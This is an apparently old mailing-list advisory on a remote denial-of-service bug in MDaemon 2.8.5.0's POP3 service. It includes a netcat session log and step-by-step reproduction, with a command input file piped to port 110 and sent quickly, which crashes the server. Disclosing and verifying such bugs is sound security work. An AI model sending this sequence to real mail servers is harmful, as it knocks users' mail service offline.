mdaemon 2.8.5.0 DoS

[Craig () FREENET DE (Craig)]

mdaemon 2.8.5.0 remote DoS

Win95   vulnerable (Tested on a K5-166 with 32MB RAM)
Win98SE vulnerable (Tested on a K7-500 with 128MB RAM)

A single user wasn´t able to receive eMail - after the password was send,
the mail client just haltet, and did nothing till the timeout.

I tried to find the error, by using netcat to enter the commands on my
own and find out, whats wrong. Playing around something strange happened:

--------------------LOG-START-----------------------
netcat 192.168.0.3 110
+OK Server1 POP service ready using UNREGISTERED SOFTWARE [1] MDaemon
v2.8.5.0 T

User User1
+OK User1... Recipient ok
pass yaddayadda
{ENTER}
-ERR that command is valid only in the AUTHORIZATION state!
uidl
-ERR unknown POP command!
quit
+OK
.
quit
+OK User1 Server1 POP Server signing off (mailbox empty)

--------------------LOG-END-----------------------------------------

MDaemon crashed after leaving, showing 2 popups.

If you try to verify this, write a input file:

-----inputfile--------------
User User1
pass yaddayadda
{just press ENTER}
uidl
quit
quit
-----eof--------------------
then:
netcat [Server_to_test] 110 <inputfile

You need to send the commands fast! The more messages you send, the more
time you
got to crash the server; you need to send all the commands before the
status of the
mailbox is shown ("+OK User1's mailbox has 3600 total messages (1018800
octets).").
When you see that message, it is to late...

If there are too many files in a users directory (e.g.
\mdaemon\users\User1") the Server
needs a long time to read them (for the report - uidl), and the clients got
timeouts
because it takes a long time.

Some people who were mailbombed could have the problem of not being able to
receive their messages and could think their account was deleted or the
password was changed.

Craig

-Craig () Freenet De-

P.S.:English is not my mother language...